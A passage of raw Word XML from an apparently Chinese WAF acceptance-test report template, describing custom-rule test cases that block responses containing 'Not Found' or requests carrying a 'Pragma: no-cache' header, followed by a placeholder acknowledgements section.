                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="27340618">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加匹配响应内容规则来检测流量是否匹配并进行日志记录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="38B4E607">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="09BED19A">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="787BB159">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="47"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C4F8A36">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="47"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5275FC3A">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="47"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在「网站防护」-「自定义规则」-「全局自定义规则」中点击「添加规则」，当用户浏览防护站点，响应内容中包含Not</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Found</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>时进行拦截；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="135A2945">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="47"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>浏览器访问一个可以返回Not</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Found内容的页面</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04EDFAA3">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75D24EC9">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0EE977D5">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="2DA6DF53">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>成功匹配自定义规则，拦截流量并记录日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1BF0B16E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="20257AD8">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58E673AE">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4749EB43">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7BD38CEB">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7DD209E7">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7DD2F0C1">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="206B1679">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="79D331DE">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="362D0B42">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="189" w:name="_Toc21077836"/>
      <w:bookmarkStart w:id="190" w:name="_Toc81916140"/>
      <w:bookmarkStart w:id="191" w:name="_Toc1956697264"/>
      <w:r>
        <w:t>Request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>匹配</w:t>
      </w:r>
      <w:bookmarkEnd w:id="189"/>
      <w:bookmarkEnd w:id="190"/>
      <w:bookmarkEnd w:id="191"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="30"/>
        <w:tblW w:w="9212"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769"/>
        <w:gridCol w:w="2835"/>
        <w:gridCol w:w="1701"/>
        <w:gridCol w:w="2907"/>
      </w:tblGrid>
      <w:tr w14:paraId="55B9BCE7">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7915B552">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="50D9FC88">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>自定义站点匹配规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0C411BDA">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5190DF68">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="3DD76B6D">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加匹配站点规则来检测流量是否匹配并进行日志记录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="12B3B5B4">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="38D63936">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="0D5D9D3E">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="48"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B661815">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="48"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76B6BF2F">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="48"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在「网站防护」-「自定义规则」-「全局自定义规则」中点击「添加规则」，当用户浏览防护站点，HTTP请求头中有字段Pragma并且值为no-cache时进行拦截；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BD15AF2">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="48"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>curl http://www.site.com/body.html -</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">H </w:t>
            </w:r>
            <w:r>
              <w:t>"Pragma: no-cache"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="099ACCE9">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">5.   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>查看W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否对攻击进行拦截并记录匹配该条自定义规则的流量日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="360E9A3E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="134E7091">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="43412AAA">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>成功匹配自定义规则，拦截流量并记录日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0EEC1C2A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="6940183C">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5AEE9C39">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
              <w:sym w:font="Wingdings 2" w:char="F052"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
              <w:t xml:space="preserve">通过     □部分通过     □未通过     □未测试 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
              <w:t>□无此功能</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2B20991D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1301287D">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E7B03DA">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="404F7DC3">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44988B30">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1C9EBDDC">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="149B3EC8">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="496D5B83">
      <w:pPr>
        <w:pStyle w:val="83"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="326"/>
        <w:ind w:firstLine="145"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkStart w:id="192" w:name="_Toc2141144655"/>
      <w:bookmarkStart w:id="193" w:name="_Toc597114432"/>
      <w:bookmarkStart w:id="194" w:name="_Toc75072864"/>
      <w:bookmarkStart w:id="195" w:name="_Toc1793829537"/>
      <w:r>
        <w:t>致谢</w:t>
      </w:r>
      <w:bookmarkEnd w:id="192"/>
      <w:bookmarkEnd w:id="193"/>
      <w:bookmarkEnd w:id="194"/>
      <w:bookmarkEnd w:id="195"/>
    </w:p>
    <w:p w14:paraId="035C9992">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:spacing w:before="163" w:after="163"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xxx</w:t>
      </w:r>
      <w:r>
        <w:t>的大力配合下，本次xxx得以顺利完成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。长亭科技</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>交付</w:t>
      </w:r>
      <w:r>
        <w:t>服务组向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XX单位</w:t>
      </w:r>
      <w:r>
        <w:t>所有参与并提供支持的部门及个人表示深深的感谢</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127C1583">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:spacing w:before="163" w:after="163"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D520128">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E0328B6">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A3D850B">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1525AFF2">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61DB8C30">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E9DECE6">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B95F6C4">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="191BF0A1">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57E116EF">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CEE4915">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C096725">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="751ADAE6">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="729D8346">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F2EEF9B">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17DC72AD">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D85AACF">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E565C45">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EDA5AE5">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="429A295E">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25408588">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="015CA338">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
